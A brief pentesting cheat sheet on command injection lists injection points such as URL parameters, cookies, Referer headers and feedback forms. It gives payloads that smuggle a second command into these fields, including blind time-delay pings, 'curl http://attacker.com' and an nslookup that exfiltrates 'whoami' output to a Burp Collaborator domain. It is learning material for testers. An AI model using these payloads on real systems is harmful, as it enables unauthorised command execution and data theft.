Command Injections
Can occur anywhere just like SQLI. Can occur in url parameters, form fields, http headers, cookies, referrer header, etc.
http://example.com/page.jsp?id=1; ping 10.11.122.34
Set-Cookies: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net
GET /index.jsp
Host: example.com
User-Agent: Mozilla/5.0 (WIndows NT 10.0; x64)
Referrer: http://example.com/page.jsp?id=1; curl http://attacker.com
Can also exist in submit feedback section, subscribe to newsletter, contact us, etc
mail -s "user feedback" -a From:user@example.com
using & ping -c5 127.0.0.1 &
we can cause delay of 5 seconds so we can identify like this as well
& nslookup `whoami`.burpcollaborator.net
Last updated